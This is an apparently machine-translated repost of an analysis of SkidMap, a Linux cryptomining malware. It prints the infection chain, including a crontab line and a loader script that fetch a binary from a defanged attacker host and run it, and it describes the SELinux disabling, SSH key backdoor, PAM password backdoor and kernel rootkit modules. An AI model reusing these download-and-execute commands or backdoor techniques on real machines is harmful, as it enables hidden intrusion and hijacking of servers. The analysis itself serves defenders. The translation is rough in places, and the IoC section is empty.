Shulou(Shulou.com)05/31 Report--

How to analyze Linux malware SkidMap, for this problem, this article details the corresponding analysis and solution, hoping to help more small partners who want to solve this problem find a simpler and easier way.

Mining cryptocurrency malware remains a pervasive threat. Cybercriminals are also increasingly exploring new platforms and methods to further exploit mining malware-from mobile devices, Unix and Unix-like systems to servers and cloud environments.

Attackers continue to improve the malware's ability to resist detection. For example, malware is bundled with watchdog components to ensure that illegal cryptocurrency mining activities persist in infected machines, or Linux-based systems utilize LD_PRELOAD-based rootkits to make their components undetectable by the system.

SkidMap is a recently discovered Linux malware that demonstrates the increasing sophistication of recent cryptocurrency mining threats. The malware stands out because it loads malicious kernel modules in such a way that its malicious behavior goes undetected.

Not only are these kernel-mode rootkits harder to detect than user-mode rootkits, attackers can also use them to gain access to affected systems. Skidmap can also set a master password that allows it to access any user account in the system. Many of SkidMap's routines require root access, and SkidMap likely uses the same attack vectors (whether through exploits, misconfigurations) that provide root or administrative access to the system to attackers.

Skidmap infection chain

Malware installs itself on target computers via crontabs, as follows:

*/1 * * * * curl -fsSL hxxp://pm[.] ipfswallet[.] tk/pm.sh | sh

Then, install the script pm.sh to download the main binary file "pc":

if [ -x "/usr/bin/wget" -o -x "/bin/wget" ]; then wget -c hxxp://pm[.] ipfswallet[.] tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/curl" -o -x "/bin/curl" ]; then curl -fs hxxp://pm[.] ipfswallet[.] tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/get" -o -x "/bin/get" ]; then get -c hxxp://pm[.] ipfswallet[.] tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/cur" -o -x "/bin/cur" ]; then cur -fs hxxp://pm[.] ipfswallet[.] tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc else url -fs hxxp://pm[.] ipfswallet[.] tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc fi

After executing the "PC" binary, security settings that weaken affected machines are changed. If the file/usr/sbin/setenforce exists, the malware executes the command setenforce 0. If the system has the/etc/selinux/config file, it writes these commands to the file: selinux=disabled and selinux=targeted commands. The former disables selinux policy (or does not allow selinux policy to be loaded), while the latter sets the selected process to run in a restricted domain.

SkidMap also provides a backdoor by having the binary add the public key of its handler to the authorized_keys file, which contains the keys needed for authentication.

In addition to backdoor entry, SkidMap also provides an attacker with another way to enter the machine. The malware replaces the system's pam_unix.so file (the module responsible for standard unix authentication) with its own malicious version (detected as backdoor.linux.pamdor.a). As shown in Figure 2, this malicious pam_unix.so file accepts any user's specific password, allowing an attacker to log in as any user on the computer.

SkidMap Cryptocurrency

The "pc" binary checks whether the operating system of the infected system is debian or rhel/centos.

For debian-based systems, it reduces the cryptocurrency miner payload to/tmp/miner2. For centos/rhel systems, it will change from url hxxp://pm[.] ipfswallet[.] tk/cos7[.] tar[.] gz Download a tar file containing cryptocurrency miner and its various components, unzip it and install it.

SkidMap Other Malicious Components

Malware components are designed to further obfuscate their malicious activities and ensure that they continue to function:

A pseudo "rm" binary file: One component contained in the tar file is a pseudo "rm" binary file that replaces the original file (rm is usually used as a command to delete files). This file sets up a malicious cron job that downloads and executes a file.

2. kaudited, install the/usr/bin/kaudited file. This binary installs multiple loadable kernel modules (LKM) on infected computers. To ensure that infected machines do not crash due to kernel-mode rootkits, it uses different modules for specific kernel versions. The kaudited binary also removes a watchdog component.

iroute, which hooks the system call getdents (usually used to read the contents of a directory) to hide specific files.

Netlink, which fakes network traffic and CPU-related statistics so that the CPU load of infected machines always looks low.

solutions

SkidMap uses fairly advanced methods to ensure that it and its components are not discovered. In addition, SkidMap has multiple ways to access affected machines, enabling them to re-impact recovered or cleaned-up systems.

Cryptocurrency mining not only affects the performance of servers and workstations, leading to higher expenses and even disrupting business. Given the use of Linux in many enterprise environments, users and administrators should keep systems and servers updated and patched; guard against unverified third-party repositories; and prevent malicious files or processes from running.

IoCs

About how to do Linux malware SkidMap analysis of the answer to the question shared here, I hope the above content can be of some help to everyone, if you still have a lot of doubts not solved, you can pay attention to the industry information channel to learn more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.